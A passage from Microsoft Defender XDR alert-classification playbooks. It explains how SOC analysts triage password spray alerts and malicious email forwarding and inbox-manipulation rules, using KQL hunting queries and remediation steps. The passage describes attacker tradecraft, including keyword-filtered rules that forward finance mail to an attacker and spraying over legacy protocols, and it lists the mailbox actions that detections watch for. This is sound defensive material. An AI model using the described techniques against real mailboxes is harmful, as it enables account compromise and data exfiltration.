-| where AccountObjectId == <ImpactedUser>
-| where Timestamp > ago(21d)
-| where ActionType == "New-InboxRule"
-| where RawEventData.SessionId in (suspiciousSessionIds)
-```
-
-## Recommended actions
-
-Once you determine that the activities associated with this alert are malicious, classify those alerts as TP and take these actions for remediation:
-
-1. Reset the user's account credentials.
-2. Revoke access tokens of the compromised account.
-3. Use number matching in Microsoft Authenticator to mitigate MFA fatigue attacks.
-4. Apply the principle of least privilege. Create accounts with minimum privilege required to complete tasks.
-5. Configure blocking based on the sender's IP address and domains if the artifacts are related to email.
-6. Block URLs or IP addresses (on the network protection platforms) that were identified as malicious during the investigation.
-
-## See also
--- [Overview of alert classification](alert-grading-playbooks.md)-- [Investigate alerts](investigate-alerts.md)
security Alert Classification Playbooks https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/alert-classification-playbooks.md
- Title: Alert classification playbooks
-description: Review the alerts for well-known attacks and take recommended actions to remediate the attack and protect your network.
--- NOCSH------ m365-security-- tier2---- autoir-- admindeeplinkDEFENDER- Previously updated : 02/11/2024--
-# Alert classification playbooks
--
-**Applies to:**
-- Microsoft Defender XDR-
-Alert classification playbooks allow you to methodically review and quickly classify the alerts for well-known attacks and take recommended actions to remediate the attack and protect your network. Alert classification will also help in properly classifying the overall incident.
-
-As a security researcher or security operations center (SOC) analyst, you must have access to the Microsoft Defender portal so that you can:
--- Assess and review the generated alerts and associated incidents. See [investigate alerts](investigate-alerts.md).-- Search your tenant's security signal data and check for potential threats and suspicious activities. See [advanced hunting](advanced-hunting-overview.md).-
-> [!NOTE]
-> You can provide feedback to Microsoft about true positive and false positives alerts, not only at the end of the investigation, but also during the investigation process. This can help Microsoft with future analysis and classification of security events.
-
-## Microsoft Defender for Office 365
-
-[Microsoft Defender for Office 365](/microsoft-365/security/office-365-security/defender-for-office-365) safeguards your organization against malicious threats posed by email messages, links (URLs), and collaboration tools. Defender for Office 365 includes:
--- Threat protection policies-
- Define threat-protection policies to set the appropriate level of protection for your organization.
--- Reports-
- View real-time reports to monitor Defender for Office 365 performance in your organization.
--- Threat investigation and response capabilities-
- Use leading-edge tools to investigate, understand, simulate, and prevent threats.
--- Automated investigation and response capabilities-
- Save time and effort investigating and mitigating threats.
-
-Defender for Office 365 alerts can be classified as:
--- True positive (TP) for confirmed malicious activity.-- False positive (FP) for confirmed non-malicious activity.-
-> [!NOTE]
-> Microsoft Defender portal [https://security.microsoft.com](https://security.microsoft.com) brings together functionality from existing Microsoft security portals. The Microsoft Defender portal emphasizes quick access to information, simpler layouts, and bringing related information together for easier use.
-
-## Microsoft Defender for Cloud Apps
-
-[Microsoft Defender for Cloud Apps](/defender-cloud-apps) is a Cloud Access Security Broker (CASB) that supports various deployment modes including log collection, API connectors, and reverse proxy. It provides rich visibility, control over data travel, and sophisticated analytics to identify and combat cyberthreats across all your Microsoft and third-party cloud services.
-
-Defender for Cloud Apps natively integrates with leading Microsoft solutions and is designed with security professionals in mind. It provides simple deployment, centralized management, and innovative automation capabilities.
-
-The Defender for Cloud Apps framework includes the capability to protect your network against cyberthreats and anomalies, detects unusual behavior across cloud apps to identify ransomware, compromised users or rogue applications. It enables the analysis of high-risk usage and can remediate automatically to limit the risk to your organization.
-
-Defender for Cloud Apps alerts can be classified as:
--- TP for confirmed malicious activity.-- Benign true positive (B-TP) for suspicious but not malicious activity, such as a penetration test or other authorized suspicious action.-- FP for confirmed non-malicious activity.-
-## Alert classification playbooks
-
-See these playbooks for steps to more quickly classify alerts for the following threats:
--- [Suspicious email forwarding activity](alert-grading-playbook-email-forwarding.md)-- [Suspicious inbox manipulation rules](alert-grading-playbook-inbox-manipulation-rules.md)-- [Suspicious inbox forwarding rules](alert-grading-playbook-inbox-forwarding-rules.md)-- [Suspicious IP addresses related to password spray activity](alert-grading-password-spray.md)-- [Password spray attacks](alert-grading-password-spray-attack.md)-
-See [Investigate alerts](investigate-alerts.md) for information on how to examine alerts with the Microsoft Defender portal.
security Alert Classification Suspicious Ip Password Spray https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/alert-classification-suspicious-ip-password-spray.md
- Title: Alert classification for suspicious IP address related to password spraying activity
-description: Alert classification for suspicious IP address related to password spraying activity to review the alerts and take recommended actions to remediate the attack and protect your network.
-
- - NOCSH
----
- - m365-security
- - tier2
--
- - MOE150
- - met150
Previously updated : 02/11/2024--
-# Alert classification for suspicious IP addresses related to password spray attacks
--
-**Applies to:**
-- Microsoft Defender XDR-
-Threat actors use password guessing techniques to gain access to user accounts. In a password spray attack, the threat actor might resort to a few of the most used passwords against many different accounts. Attackers successfully compromise accounts using password spraying since many users still utilize default and weak passwords.
-
-This playbook helps you investigate instances where IP addresses have been labeled risky or associated with a password spray attack, or suspicious unexplained activities were detected, such as a user signing in from an unfamiliar location or a user getting unexpected multi-factor authentication (MFA) prompts. This guide is for security teams like the security operations center (SOC) and IT administrators who review, handle/manage, and classify the alerts. This guide helps in quickly classifying the alerts as either [true positive (TP) or false positive (FP)](investigate-alerts.md) and, in the case of TP, take recommended actions to remediate the attack and mitigate the security risks.
-
-The intended results of using this guide are:
--- You've identified the alerts associated with password-spray IP addresses as malicious (TP) or false positive (FP) activities.--- You've taken the necessary action if IP addresses have been performing password spray attacks.-
-## Investigation steps
-
-This section contains step-by-step guidance to respond to the alert and take the recommended actions to protect your organization from further attacks.
-
-### 1. Review the alert
-
-Here's an example of a password spray alert in the alert queue:
--
-This means there's suspicious user activity originating from an IP address that might be associated with a brute-force or password spray attempt according to threat intelligence sources.
-
-### 2. Investigate the IP address
--- Look at the [activities](microsoft-365-security-center-defender-cloud-apps.md) that originated from the IP:-
- - **Is it mostly failed attempts to sign in?**
-
- - **Does the interval between attempts to sign in look suspicious?** Automated password spray attacks tend to have a regular time interval between attempts.
-
- - **Are there successful attempts of a user/several users signing in with [MFA](/microsoft-365/admin/security-and-compliance/multi-factor-authentication-microsoft-365) prompts?** The existence of these attempts might indicate that the IP isn't malicious.
-
- - **Are legacy protocols used?** Using protocols like POP3, IMAP, and SMTP might indicate an attempt to perform a password spray attack. Finding `Unknown(BAV2ROPC)` in the user agent (Device type) in the [Activity log](/defender-cloud-apps/activity-filters#ip-address-insights) indicates use of legacy protocols. You can refer to the example below when looking at the Activity log. This activity must be further correlated to other activities.
-
- :::image type="content" source="../../media/alert-grading-playbook-password-spray/fig2-password-spray-alert.png" alt-text="Screenshot of Microsoft Defender 365 interface showing the Device type." lightbox="../../media/alert-grading-playbook-password-spray/fig2-password-spray-alert.png":::
-
- _Figure 1. The Device type field shows `Unknown(BAV2ROPC)` user agent in Microsoft Defender XDR._
-
- - **Check the use of anonymous proxies or the Tor network.** Threat actors often use these alternative proxies to hide their information, making them difficult to trace. However, not all use of said proxies correlate with malicious activities. You must investigate other suspicious activities that might provide better attack indicators.
- - Is the IP address coming from a virtual private network (VPN)? Is the VPN trustworthy? **Check if the IP originated from a VPN and review the organization behind it by using tools** like [RiskIQ](https://community.riskiq.com/learn-more/enterprise).
- - **Check other IPs with the same subnet/ISP.** Sometimes password spray attacks originate from many different IPs within the same subnet/ISP.
-- **Is the IP address common for the tenant?** Check the Activity log to see if the tenant has seen the IP address in the past 30 days.-- **Search for other suspicious activities or alerts that originated from the IP in the tenant.** Examples of activities to look out for might include email deletion, forwarding rules creation, or file downloads after a successful attempt to sign in.-- **Check the IP address' risk score** by using tools like RiskIQ.-
-### 3. Investigate suspicious user activity after signing in
-
-Once a suspicious IP is recognized, you can review the accounts that signed in. It's possible that a group of accounts were compromised and successfully used to sign in from the IP or other similar IPs.
-
-Filter all successful attempts to sign in from the IP address around and shortly after the time of the alerts. Then search for malicious or unusual activities in such accounts after signing in.
--- User account activities-
- **Validate that the activity in the account preceding the password spray activity is not suspicious.** For example, check if there's anomalous activity based on common location or ISP, if the account is utilizing a user-agent that it didn't use before, if any other guest accounts were created, if any other credentials were created after the account signed in from a malicious IP, among others.
--- Alerts-
- **Check whether the user received other alerts preceding the password spray activity.** Having these alerts indicate that the user account might be compromised. Examples include impossible travel alert, activity from infrequent country/region, and suspicious email deletion activity, among others.
--- Incident-
- **Check whether the alert is associated with other alerts that indicate an incident.** If so, then check whether the incident contains other true positive alerts.
-
-## Advanced hunting queries
-
-[Advanced hunting](/microsoft-365/security/defender/advanced-hunting-overview) is a query-based threat hunting tool that lets you inspect events in your network and locate threat indicators.
-
-Use this query to find accounts with attempts to sign in with the highest risk scores that came from the malicious IP. This query also filters all successful attempts to sign in with corresponding risk scores.
-
-```kusto
-let start_date = now(-7d);
-let end_date = now();
-let ip_address = ""; // enter here the IP address
-AADSignInEventsBeta
-| where Timestamp between (start_date .. end_date)
-| where IPAddress == ip_address
-| where isnotempty(RiskLevelDuringSignIn)
-| project Timestamp, IPAddress, AccountObjectId, RiskLevelDuringSignIn, Application, ResourceDisplayName, ErrorCode
-| sort by Timestamp asc
-| sort by AccountObjectId, RiskLevelDuringSignIn
-| partition by AccountObjectId ( top 1 by RiskLevelDuringSignIn ) // remove line to view all successful logins risk scores
-```
-
-Use this query to check if the suspicious IP used legacy protocols in attempts to sign in.
-
-```kusto
-let start_date = now(-8h);
-let end_date = now();
-let ip_address = ""; // enter here the IP address
-AADSignInEventsBeta
-| where Timestamp between (start_date .. end_date)
-| where IPAddress == ip_address
-| summarize count() by UserAgent
-```
-
-Use this query to review all alerts in the last seven days associated with the suspicious IP.
-
-```kusto
-let start_date = now(-7d);
-let end_date = now();
-let ip_address = ""; // enter here the IP address
-let ip_alert_ids = materialize (
- AlertEvidence
- | where Timestamp between (start_date .. end_date)
- | where RemoteIP == ip_address
- | project AlertId);
-AlertInfo
-| where Timestamp between (start_date .. end_date)
-| where AlertId in (ip_alert_ids)
-```
-
-Use this query to review account activity for suspected compromised accounts.
-
-```kusto
-let start_date = now(-8h);
-let end_date = now();
-let ip_address = ""; // enter here the IP address
-let compromise_users =
- materialize ( AADSignInEventsBeta
- | where Timestamp between (start_date .. end_date)
- | where IPAddress == ip_address
- | where ErrorCode == 0
- | distinct AccountObjectId);
-CloudAppEvents
- | where Timestamp between (start_date .. end_date)
- | where AccountObjectId in (compromise_users)
- | summarize ActivityCount = count() by AccountObjectId, ActivityType
- | extend ActivityPack = pack(ActivityType, ActivityCount)
- | summarize AccountActivities = make_bag(ActivityPack) by AccountObjectId
-```
-
-Use this query to review all alerts for suspected compromised accounts.
-
-```kusto
-let start_date = now(-8h); // change time range
-let end_date = now();
-let ip_address = ""; // enter here the IP address
-let compromise_users =
- materialize ( AADSignInEventsBeta
- | where Timestamp between (start_date .. end_date)
- | where IPAddress == ip_address
- | where ErrorCode == 0
- | distinct AccountObjectId);
-let ip_alert_ids = materialize ( AlertEvidence
- | where Timestamp between (start_date .. end_date)
- | where AccountObjectId in (compromise_users)
- | project AlertId, AccountObjectId);
-AlertInfo
-| where Timestamp between (start_date .. end_date)
-| where AlertId in (ip_alert_ids)
-| join kind=innerunique ip_alert_ids on AlertId
-| project Timestamp, AccountObjectId, AlertId, Title, Category, Severity, ServiceSource, DetectionSource, AttackTechniques
-| sort by AccountObjectId, Timestamp
-```
-
-## Recommended Actions
-
-1. [Block the attacker's IP address.](/azure/active-directory/conditional-access/block-legacy-authentication)
-2. Reset user accounts' credentials.
-3. Revoke access tokens of compromised accounts.
-4. [Block legacy authentication.](/azure/active-directory/conditional-access/howto-conditional-access-policy-block-legacy)
-5. [Require MFA for users](/microsoft-365/business-premium/m365bp-turn-on-mfa) if possible to [enhance account security](/azure/active-directory/authentication/tutorial-enable-azure-mfa) and make account compromise by a password spray attack difficult for the attacker.
-6. Block the compromised user account from signing in if needed.
-
-## See also
--- [Overview of alert classification](alert-grading-playbooks.md)-- [Classifying password spray attacks](alert-grading-password-spray-attack.md)-- [Investigate alerts](investigate-alerts.md)
security Alert Grading Playbook Email Forwarding https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/alert-grading-playbook-email-forwarding.md
- Title: Alert classification for suspicious email forwarding activity
-description: Alert classification for suspicious email forwarding activity to review the alerts and take recommended actions to remediate the attack and protect your network.
-
- - NOCSH
----
- - m365-security
- - tier2
--
- - MOE150
- - met150
Previously updated : 04/03/2024--
-# Alert classification for suspicious email forwarding activity
--
-**Applies to:**
-- Microsoft Defender XDR-
-Threat actors can use compromised user accounts for several malicious purposes, including reading emails in a user's inbox, forwarding emails to external recipients, and sending phishing mails, among others. The targeted user might be unaware that their emails are being forwarded. This is a common tactic that attackers use when user accounts are compromised.
-
-Emails can be forwarded either manually or automatically using forwarding rules. Automatic forwarding can be implemented in multiple ways like Inbox Rules, Exchange Transport Rule (ETR), and SMTP Forwarding. While manual forwarding requires direct action from users, they might not be aware of all the autoforwarded emails. In Microsoft 365, an alert is raised when a user autoforwards an email to a potentially malicious email address.
-
-This playbook helps you investigate Suspicious Email Forwarding Activity alerts and quickly grade them as either a true positive (TP) or a false positive (FP). You can then take recommended actions for the TP alerts to remediate the attack.
-
-For an overview of alert classifications for Microsoft Defender for Office 365 and Microsoft Defender for Cloud Apps, see the [introduction article](alert-grading-playbooks.md).
-
-The results of using this playbook are:
--- You identify the alerts associated with autoforwarded emails as malicious (TP) or benign (FP) activities.-
- If malicious, you have [stop email autoforwarding](../office-365-security/outbound-spam-policies-external-email-forwarding.md) for the affected mailboxes.
--- You take the necessary action if emails were forwarded to a malicious email address.-
-## Email forwarding rules
-
-Email forwarding rules allow users to create a rule to forward email messages sent to a user's mailbox to another user's mailbox inside or outside of the organization. Some email users, particularly those with multiple mailboxes, configure forwarding rules to move employer emails to their private email accounts. Email forwarding is a useful feature but can also pose a security risk because of the potential disclosure of information. Attackers might use this information to attack your organization or its partners.
-
-### Suspicious email forwarding activity
-
-Attackers might set up email rules to hide incoming emails in the compromised user mailbox to obscure their malicious activities from the user. They might also set rules in the compromised user mailbox to delete emails, move the emails into another less noticeable folder such as an RSS folder, or forward emails to an external account.
-
-Some rules might move all the emails to another folder and mark them as "read", while some rules might move only mails that contain specific keywords in the email message or subject. For example, the inbox rule might be set to look for keywords like "invoice," "phish," "do not reply," "suspicious email," or "spam," among others, and move them to an external email account. Attackers might also use the compromised user mailbox to distribute spam, phishing emails, or malware.
-
-Microsoft Defender for Office 365 can detect and alert on suspicious email forwarding rules, allowing you to find and delete hidden rules at the source.
-
-For more information, see these blog posts:
--- [Business Email Compromise](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/business-email-uncompromised-part-one/ba-p/2159900)-- [Behind the scenes of business email compromise: Using cross-domain threat data to disrupt a large BEC campaign](https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/)-
-## Alert details
-
-To review the Suspicious Email Forwarding Activity alert, open the **Alerts** page to see the **Activity list** section. Here's an example.
--
-Select **Activity** to view the details of that activity in the sidebar. Here's an example.
--
-## Investigation workflow
-
-While investigating this alert, you must determine:
--- Is the user account and its mailbox compromised?-- Are the activities malicious?-
-### Is the user account and its mailbox compromised?
-
-By looking at sender's past behavior and recent activities, you should be able to determine whether the user's account should be considered compromised or not. You can see the details of alerts raised from the user's page in the Microsoft Defender portal.
-
-You can also analyze these other activities for the affected mailbox:
--- Use Threat Explorer to understand email related threats
- - Observe how many of the recent email sent by the sender are detected as phish, spam, or malware.
- - Observe how many of the sent emails contain sensitive information.
--- Assess risky sign-in behavior in the Microsoft Azure portal.-- Check for any malicious activities on the user's device.-
-### Are the activities malicious?
-
-Investigate the email forwarding activity. For instance, check the type of email, recipient of this email, or the manner in which the email is forwarded.
-
-For more information, see the following articles:
--- [Autoforwarded messages report in the EAC](/exchange/monitoring/mail-flow-reports/mfr-auto-forwarded-messages-report)-- [New users forwarding email insight in the EAC](/exchange/monitoring/mail-flow-insights/mfi-new-users-forwarding-email-insight)-- [Responding to a Compromised Email Account](/microsoft-365/security/office-365-security/responding-to-a-compromised-email-account)-- [Report false positives and false negatives in Outlook](/microsoft-365/security/office-365-security/submissions-outlook-report-messages)-
-Here's the workflow to identify suspicious email forwarding activities.
--
-You can investigate an email forwarding alert using Threat Explorer or with advanced hunting queries, based on the availability of features in the Microsoft Defender portal. You may choose to follow the entire process or a part of the process as needed.
-
-## Using Threat Explorer
-
-Threat Explorer provides an interactive investigation experience for email related threats to determine whether this activity is suspicious or not. You can use the following indicators from the alert information:
--- SRL/RL: Use the (Suspicious) Recipients List (SRL) to find these details:-
- :::image type="content" source="../../media/alert-grading-playbook-email-forwarding/alert-grading-playbook-email-forwarding-recipients-list.png" alt-text="Example of the list of recipients" lightbox="../../media/alert-grading-playbook-email-forwarding/alert-grading-playbook-email-forwarding-recipients-list.png":::
-
- - Who else has forwarded emails to these recipients?
- - How many emails have been forwarded to these recipients?
- - How frequently are emails forwarded to these recipients?
--- MTI: Use the Message Trace ID/Network Message ID to find these details:-
- :::image type="content" source="../../media/alert-grading-playbook-email-forwarding/alert-grading-playbook-email-forwarding-network-message-id.png" alt-text="Example of the Network Message ID" lightbox="../../media/alert-grading-playbook-email-forwarding/alert-grading-playbook-email-forwarding-network-message-id.png":::
-
- - What other details are available for this email? For example: subject, return path, and timestamp.
- - What is the origin of this email? Are there any similar emails?
- - Does this email contain any URLs? Does the URL point to any sensitive data?
- - Does the email contain any attachments? Do the attachments contain sensitive information?
- - What was the action taken on the email? Was it deleted, marked as read, or moved to another folder?
- - Are there any threats associated with this email? Is this email part of any campaign?
-
-Based on answers to these questions, you should be able to determine whether an email is malicious or benign.
-
-## Advanced hunting queries
-
-To use [advanced Hunting](advanced-hunting-overview.md) queries to gather information related to an alert and determine whether or not the activity is suspicious, make sure you have access to the following tables:
--- EmailEvents - Contains information related to email flow.--- EmailUrlInfo - Contains information related to URLs in emails.--- CloudAppEvents -Contains audit log of user activities.--- IdentityLogonEvents - Contains sign-in information for all users.-
-> [!NOTE]
-> Certain parameters are unique to your organization or network. Fill in these specific parameters as instructed in each query.
-
-Run this query to find out who else forwarded emails to these recipients (SRL/RL).
-
-```kusto
-let srl=pack_array("{SRL}"); //Put values from SRL here.
-EmailEvents
-| where RecipientEmailAddress in (srl)
-| distinct SenderDisplayName, SenderFromAddress, SenderObjectId
-```
-
-Run this query to find out how many emails were forwarded to these recipients.
-
-```kusto
-let srl=pack_array("{SRL}"); //Put values from SRL here.
-EmailEvents
-| where RecipientEmailAddress in (srl)
-| summarize Count=dcount(NetworkMessageId) by RecipientEmailAddress
-```
-
-Run this query to find out how frequently are emails forwarded to these recipients.
-
-```kusto
-let srl=pack_array("{SRL}"); //Put values from SRL here.
-EmailEvents
-| where RecipientEmailAddress in (srl)
-| summarize Count=dcount(NetworkMessageId) by RecipientEmailAddress, bin(Timestamp, 1d)
-```
-
-Run this query to find out if the email contains any URLs.
-
-```kusto
-let mti='{MTI}'; //Replace {MTI} with MTI from alert
-EmailUrlInfo
-| where NetworkMessageId == mti
-```
-
-Run this query to find out if the email contains any attachments.
-
- ```kusto
- let mti='{MTI}'; //Replace {MTI} with MTI from alert
- EmailAttachmentInfo
- | where NetworkMessageId == mti
- ```
-
-Run this query to find out if the Forwarder (sender) has created any new rules.
-
-```kusto
-let sender = "{SENDER}"; //Replace {SENDER} with display name of Forwarder
-let action_types = pack_array(
- "New-InboxRule",
- "UpdateInboxRules",
- "Set-InboxRule",
- "Set-Mailbox",
- "New-TransportRule",
- "Set-TransportRule");
-CloudAppEvents
-| where AccountDisplayName == sender
-| where ActionType in (action_types)
-```
-
-Run this query to find out if there were any anomalous sign-in events from this user. For example: unknown IPs, new applications, uncommon countries/regions, multiple LogonFailed events.
-
-```kusto
-let sender = "{SENDER}"; //Replace {SENDER} with email of the Forwarder
-IdentityLogonEvents
-| where AccountUpn == sender
-```
-
-### Investigating forwarding rules
-
-You can also find suspicious forwarding rules using the Exchange admin center, based on the rule type (the FT value in the alert).
--- ETR-
- Exchange transport rules are listed in the **Rules** section. Verify that all rules are as expected.
--- SMTP-
- You can see mailbox forwarding rules by selecting the sender's mailbox **\> Manage mail flow settings \> Email forwarding \> Edit**.
--- InboxRule-
- Inbox rules are configured with the e-mail client. You can use the [Get-InboxRule](/powershell/module/exchange/get-inboxrule) PowerShell cmdlet to list the inbox rules created by users.
-
-### Additional investigation
-
-Along with the evidence discovered so far, you can determine if there are new forwarding rules being created. Investigate the IP address associated with the rule. Ensure that it is not an anomalous IP address and is consistent with usual activities performed by the user.
-
-## Recommended actions
-
-Once you determine that the activities associated make this alert a True Positive, classify the alert and take these actions for remediation:
-
-1. Disable and delete the inbox forwarding rule.
-2. For the InboxRule forwarding type, reset the user's account credentials.
-3. For the SMTP or ETR forwarding type, investigate the activities of the user account that created the alert.
-
- - Investigate any other suspicious admin activities.
-
- - Reset the user account's credentials.
-
-4. Check for other activities originated from impacted accounts, IP addresses, and suspicious senders.
-
-## See also
--- [Overview of alert classification](alert-grading-playbooks.md)-- [Suspicious inbox forwarding rules](alert-grading-playbook-inbox-forwarding-rules.md)-- [Suspicious inbox manipulation rules](alert-grading-playbook-inbox-manipulation-rules.md)-- [Investigate alerts](investigate-alerts.md)-
security Alert Grading Playbook Inbox Forwarding Rules https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/alert-grading-playbook-inbox-forwarding-rules.md
- Title: Alert classification for suspicious inbox forwarding rules
-description: Alert classification for suspicious inbox forwarding rules to review the alerts and take recommended actions to remediate the attack and protect your network.
-
- - NOCSH
----
- - m365-security
- - tier2
--
- - MOE150
- - met150
Previously updated : 04/03/2024--
-# Alert classification for suspicious inbox forwarding rules
--
-**Applies to:**
-- Microsoft Defender XDR-
-Threat actors can use compromised user accounts for several malicious purposes including reading emails in a user's inbox, creating inbox rules to forward emails to external accounts, sending phishing mails, among others. Malicious inbox rules are widely common during business email compromise (BEC) and phishing campaigns, and it important to monitor them consistently.
-
-This playbook helps you investigate alerts for suspicious inbox forwarding rules and quickly grade them as either a true positive (TP) or a false positive (TP). You can then take recommended actions for the TP alerts to remediate the attack.
-
-For an overview of alert classification for Microsoft Defender for Office 365 and Microsoft Defender for Cloud Apps, see the [introduction article](alert-grading-playbooks.md).
-
-The results of using this playbook are:
--- You've identified the alerts associated with inbox forwarding rules as malicious (TP) or benign (FP) activities.-
- If malicious, you have removed malicious inbox forwarding rules.
--- You've taken the necessary action if emails have been forwarded to a malicious email address.-
-## Inbox forwarding rules
-
-You configure inbox rules to automatically manage email messages based on predefined criteria. For example, you can create an inbox rule to move all messages from your manager into another folder, or forward messages you receive to another email address.
-
-### Suspicious inbox forwarding rules
-
-After gaining access to users' mailboxes, attackers often create an inbox rule that allows them to exfiltrate sensitive data to an external email address and use it for malicious purposes.
-
-Malicious inbox rules automate the exfiltration process. With specific rules, every email in the target user's inbox that matches the rule criteria will be forwarded to the attacker's mailbox. For example, an attacker might want to gather sensitive data related to finance. They create an inbox rule to forward all emails that contain keywords, such as 'finance' and 'invoice' in the subject or message body, to their mailbox.
-
-Suspicious inbox forwarding rules might be difficult to detect because maintenance of inbox rules is common task done by users. Therefore, it's important to monitor the alerts.
-
-## Workflow
-
-Here's the workflow to identify suspicious email forwarding rules.
--
-## Investigation steps
-
-This section contains detailed step-by-step guidance to respond to the incident and take the recommended steps to protect your organization from further attacks.
-
-### Review generated alerts
-
-Here's an example of an inbox forwarding rule alert in the alert queue.
--
-Here's an example of the details of alert that was triggered by a malicious inbox forwarding rule.
--
-### Investigate rule parameters
-
-The purpose of this stage is to determine if the rules look suspicious by certain criteria:
-
-Recipients of the forwarding rule:
--- Validate destination email address isn't an additional mailbox owned by the same user (avoiding cases where the user is self-forwarding emails between personal mailboxes).-- Validate the destination email address isn't an internal address or sub-domain that belongs to the company.-
-Filters:
--- If the inbox rule contains filters, which search for specific keywords in the subject or body of the email, check whether the provided keywords, such as finance, credentials, and networking, among others, seem related to malicious activity. You can find these filters under the following attributes (which shows up in the event RawEventData column): "BodyContainsWords", "SubjectContainsWords" or "SubjectOrBodyContainsWords"-- If the attacker chooses not to set any filter to the mails, and instead the inbox rule forwards all the mailbox items to the attacker's mailbox), then this behavior is suspicious as well.-
-### Investigate IP address
-
-Review the attributes that related to the IP address that performed the relevant event of rule creation:
-
-1. Search for other suspicious cloud activities that originated from the same IP in the tenant. For instance, suspicious activity might be multiple failed login attempts.
-2. Is the ISP common and reasonable for this user?
-3. Is the location common and reasonable for this user?
-
-### Investigate any suspicious activity with the user inbox before creating rules
-
-You can review all user activities before creating rules, check for indicators of compromise, and investigate user actions that seem suspicious. For instance, multiple failed sign ins.
--- Sign ins:-
- Validate that the sign in activity prior to the rule creation event isn't suspicious (such as the common location, ISP, or user-agent).
--- Other alerts or incidents
- - Did other alerts trigger for the user prior to the rule creation. If so, then this might indicate that the user got compromised.
- - If the alert correlates with other alerts to indicate an incident, then does the incident contain other true positive alerts?
-
-## Advanced hunting queries
-
-[Advanced Hunting](advanced-hunting-overview.md) is a query-based threat hunting tool that lets you inspect events in your network and locate threat indicators.
-
-Run this query to find all the new inbox rule events during a specific time window.
-
-```kusto
-let start_date = now(-10h);
-let end_date = now();
-let user_id = ""; // enter here the user id
-CloudAppEvents
-| where Timestamp between (start_date .. end_date)
-| where AccountObjectId == user_id
-| where Application == @"Microsoft Exchange Online"
-| where ActionType in ("Set-Mailbox", "New-InboxRule", "Set-InboxRule") //set new inbox rule related operations
-| project Timestamp, ActionType, CountryCode, City, ISP, IPAddress, RuleConfig = RawEventData.Parameters, RawEventData
-```
-
-*RuleConfig* will contain the rule configuration.
-
-Run this query to check whether the ISP is common for the user by looking at the history of the user.
-
-```kusto
-let alert_date = now(); //enter alert date
-let timeback = 30d;
-let userid = ""; //enter here user id
-CloudAppEvents
-| where Timestamp between ((alert_date-timeback)..(alert_date-1h))
-| where AccountObjectId == userid
-| make-series ActivityCount = count() default = 0 on Timestamp from (alert_date-timeback) to (alert_date-1h) step 12h by ISP
-```
-
-Run this query to check whether the country/region is common for the user by looking at the history of the user.
-
-```kusto
-let alert_date = now(); //enter alert date
-let timeback = 30d;
-let userid = ""; //enter here user id
-CloudAppEvents
-| where Timestamp between ((alert_date-timeback)..(alert_date-1h))
-| where AccountObjectId == userid
-| make-series ActivityCount = count() default = 0 on Timestamp from (alert_date-timeback) to (alert_date-1h) step 12h by CountryCode
-```
-
-Run this query to check whether the user-agent is common for the user by looking at the history of the user.
-
-```kusto
-let alert_date = now(); //enter alert date
-let timeback = 30d;
-let userid = ""; //enter here user id
-CloudAppEvents
-| where Timestamp between ((alert_date-timeback)..(alert_date-1h))
-| where AccountObjectId == userid
-| make-series ActivityCount = count() default = 0 on Timestamp from (alert_date-timeback) to (alert_date-1h) step 12h by UserAgent
-```
-
-Run this query to check if other users created forward rule to the same destination (could indicate that other users are compromised as well).
-
-```kusto
-let start_date = now(-10h);
-let end_date = now();
-let dest_email = ""; // enter here destination email as seen in the alert
-CloudAppEvents
-| where Timestamp between (start_date .. end_date)
-| where ActionType in ("Set-Mailbox", "New-InboxRule", "Set-InboxRule") //set new inbox rule related operations
-| project Timestamp, ActionType, CountryCode, City, ISP, IPAddress, RuleConfig = RawEventData.Parameters, RawEventData
-| where RuleConfig has dest_email
-```
-
-## Recommended actions
-
-1. Disable the malicious inbox rule.
-2. Reset the user's account credentials. You can also verify if the user account has been compromised with Microsoft Defender for Cloud Apps, which gets security signals from Microsoft Entra ID Protection.
-3. Search for other malicious activities performed by the impacted user.
-4. Check for other suspicious activity in the tenant originated from the same IP or from the same ISP (if the ISP is uncommon) to find other compromised users.
-
-## See also
--- [Overview of alert classification](alert-grading-playbooks.md)-- [Suspicious email forwarding activity](alert-grading-playbook-email-forwarding.md)-- [Suspicious inbox manipulation rules](alert-grading-playbook-inbox-manipulation-rules.md)-- [Investigate alerts](investigate-alerts.md)
security Alert Grading Playbook Inbox Manipulation Rules https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/alert-grading-playbook-inbox-manipulation-rules.md
- Title: Alert classification for suspicious inbox manipulation rules
-description: Alert classification for suspicious inbox manipulation rules to review the alerts and take recommended actions to remediate the attack and protect your network.
-
- - NOCSH
----
- - m365-security
- - tier2
--
- - MOE150
- - met150
Previously updated : 04/05/2023--
-# Alert classification for suspicious inbox manipulation rules
--
-**Applies to:**
-- Microsoft Defender XDR-
-Threat actors can use compromised user accounts for many malicious purposes including reading emails in a user's inbox, creating inbox rules to forward emails to external accounts, deleting traces, and sending phishing mails. Malicious inbox rules are common during business email compromise (BEC) and phishing campaigns and it's important to monitor for them consistently.
-
-This playbook helps you investigate any incident related to suspicious inbox manipulation rules configured by attackers and take recommended actions to remediate the attack and protect your network. This playbook is for security teams, including security operations center (SOC) analysts and IT administrators who review, investigate, and grade the alerts. You can quickly grade alerts as either a true positive (TP) or a false positive (TP) and take recommended actions for the TP alerts to remediate the attack.
-
-The results of using this playbook are:
--- You identify the alerts associated with inbox manipulation rules as malicious (TP) or benign (FP) activities.-
- If malicious, you remove malicious inbox manipulation rules.
--- You take the necessary action if emails were forwarded to a malicious email address.-
-## Inbox manipulation rules
-
-Inbox rules are set to automatically manage email messages based on predefined criteria. For example, you can create an inbox rule to move all messages from your manager into another folder, or forward messages you receive to another email address.
-
-### Malicious inbox manipulation rules
-
-Attackers might set up email rules to hide incoming emails in the compromised user mailbox to obscure their malicious activities from the user. They might also set rules in the compromised user mailbox to delete emails, move the emails into another less noticeable folder (like RSS), or forward mails to an external account. Some rules might move all the emails to another folder and mark them as "read", while some rules might move only mails that contain specific keywords in the email message or subject.
-
-For example, the inbox rule might be set to look for keywords like "invoice," "phish," "do not reply," "suspicious email," or "spam," among others, and move them to an external email account. Attackers might also use the compromised user mailbox to distribute spam, phishing emails, or malware.
-
-## Workflow
-
